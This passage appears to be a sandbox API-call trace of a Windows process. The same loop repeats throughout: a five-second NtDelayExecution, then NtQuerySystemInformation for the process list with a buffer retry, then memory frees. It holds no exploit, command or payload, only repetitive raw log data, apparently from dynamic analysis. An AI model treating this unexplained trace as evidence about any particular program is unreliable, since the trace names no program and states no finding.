NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.815] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.861] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.892] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.924] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.002] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.053] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.063] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.081] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.111] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.127] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 